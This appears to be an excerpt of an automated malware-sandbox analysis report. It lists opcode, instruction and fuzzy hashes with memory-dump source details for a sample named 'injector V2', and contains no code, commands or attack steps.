                                                                                    • Opcode ID: aa0bba6222a3d435aec5eb64508d0d06dea4e146d79f39eb269294be122f10e2
                                                                                    • Instruction ID: b7ecc1b1e8e254b4b41e0523eaffba5e087f870cf2997bc25913639950a96f77
                                                                                    • Opcode Fuzzy Hash: aa0bba6222a3d435aec5eb64508d0d06dea4e146d79f39eb269294be122f10e2
                                                                                    • Instruction Fuzzy Hash: FD51D272B11D1147D75C8A3D9C2277AB293ABC5324F5C832EEA27DB3D5DE3898128684
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fbebd50d2877825441b0283b096e8df1a0b339b54f1c7536cc168f26ec9a7bf5
                                                                                    • Instruction ID: f5f0e4abd8f2197cd50e3826bca16fc8f654f80e4a3ec16201971593374c54b9
                                                                                    • Opcode Fuzzy Hash: fbebd50d2877825441b0283b096e8df1a0b339b54f1c7536cc168f26ec9a7bf5
                                                                                    • Instruction Fuzzy Hash: 4C317D71A442006BF714DF25DC81B3BB269EFC5348F04983EF98A93252E235DC15825B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6b930b8f1d1c79882646380d608656a487a45ef369a009ece13ef3fd6dead8c0
                                                                                    • Instruction ID: 3f89de71dcd256d75a6e9f3add646b54f05b37f40cc2575bcc216b7eb0beb8b8
                                                                                    • Opcode Fuzzy Hash: 6b930b8f1d1c79882646380d608656a487a45ef369a009ece13ef3fd6dead8c0
                                                                                    • Instruction Fuzzy Hash: 153106606057918BE7268F3594607B3BBE59F33304F9824BEC0D7E7383D6B9A50A8719
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e4f98cfab76652dd9705530a0b4d44f54676ed4c850c7203bb028c1cbab53d01
                                                                                    • Instruction ID: 2300e1b2cabd148c2755dea064deaf0a9ef10d0df6b83e55c4b1d5862a3f4173
                                                                                    • Opcode Fuzzy Hash: e4f98cfab76652dd9705530a0b4d44f54676ed4c850c7203bb028c1cbab53d01
                                                                                    • Instruction Fuzzy Hash: DB3168B69283108AD710CF16C88126BBAB2FFD1318F099D4DE4C12B345EB79D501CB86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b08eaf5dab14eefdacf2d5299b26ba817f16b82547a31f996ba2a47f64421abe
                                                                                    • Instruction ID: 73be866d36d2c69ece61f5aa691b8487a64f63c0c172fe79b4cb7161451752ec
                                                                                    • Opcode Fuzzy Hash: b08eaf5dab14eefdacf2d5299b26ba817f16b82547a31f996ba2a47f64421abe
                                                                                    • Instruction Fuzzy Hash: D221BEB065C3405BD7148F35C8A176BBBE1AB8A318F188A6DE0D6973D1D379C5498B09
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                    • Instruction ID: df218fecf1d2d99cc99cac15c08ecd2c1274b3ea3335ebc6b0616032a60435af
                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                    • Instruction Fuzzy Hash: F9112933A051D10FC3168D3C8400565BFA30A9B238F5AD39AF4B49B2D6D6278D8A8359
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 501327ee5778e54276eceebaa8889c239e5c5c003c7d7c24a23ce77e23ed22a6
                                                                                    • Instruction ID: 4489895cca936e4abe409225e898e03886df2ad83094abc39497c55c0caecd12
                                                                                    • Opcode Fuzzy Hash: 501327ee5778e54276eceebaa8889c239e5c5c003c7d7c24a23ce77e23ed22a6
                                                                                    • Instruction Fuzzy Hash: A5019EF1B00B2157D620AE15A4D173BB2A96B91708F58493EE84867342DB7AEC1486EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 701ab4b16e5d8c3835dc58eab3428ea4a2eb49a2cfb8e48d68bf144173fa0bf6
                                                                                    • Instruction ID: 502b15905b95d2415722392238a37ea4478960f04c60f78b64d407422a97dbc3
                                                                                    • Opcode Fuzzy Hash: 701ab4b16e5d8c3835dc58eab3428ea4a2eb49a2cfb8e48d68bf144173fa0bf6
                                                                                    • Instruction Fuzzy Hash: 24212FB8411B959FD330DF22E590657BBF0BB02B18B018E0EC8C22BB04E738A441CF84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1702256058ba8ae1f135b08a0c1aff2490d3d93f5ef519058005c57e8c80f43a
                                                                                    • Instruction ID: 685ab43d0681d246d38c373255c2debea23af3536c657c9476a487a5431206a9
                                                                                    • Opcode Fuzzy Hash: 1702256058ba8ae1f135b08a0c1aff2490d3d93f5ef519058005c57e8c80f43a
                                                                                    • Instruction Fuzzy Hash: 3A01F73AB582424FD305CFA9F8911B67363A7D731036D606AC186A7717D9B0AD1B8748
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6263a111e4431cf229a4f9c988475e808a76b337e934fa65a45ff73b139d9f5
                                                                                    • Instruction ID: feacb86999ce9ff7795c3953c93015704ce3b6e090d15c77f2584a537cf6127b
                                                                                    • Opcode Fuzzy Hash: c6263a111e4431cf229a4f9c988475e808a76b337e934fa65a45ff73b139d9f5
                                                                                    • Instruction Fuzzy Hash: 54D012686052586F5618DB599C56D337A7DC643344B007028B942E3391C900AC10C5AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 550c360841e3f47cc10e6d05a462e5641be7cb35a74dbf4335e2cbc0cf2be45a
                                                                                    • Instruction ID: fb63768699409a5dfa46efd542a61eda3e4a625d5d8ff59f84200bfc470c8de5
                                                                                    • Opcode Fuzzy Hash: 550c360841e3f47cc10e6d05a462e5641be7cb35a74dbf4335e2cbc0cf2be45a
                                                                                    • Instruction Fuzzy Hash: 5CE08C7690C2C18BC3009F2D9C800AABA722EDB108B3A86A298D883367C938C5098749
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 52f65cf7adf809ca86fd35004999eeba456f81f404232e7dbb88cebb7e75223d
                                                                                    • Instruction ID: a8b9983a00085ea965ea068030661833ffe602a2ce69df8dac9738155861896d
                                                                                    • Opcode Fuzzy Hash: 52f65cf7adf809ca86fd35004999eeba456f81f404232e7dbb88cebb7e75223d
                                                                                    • Instruction Fuzzy Hash: 53B092BAC04800A6D0112F113E4683EB036055360CF0524BEE84632242AB2BD21A506F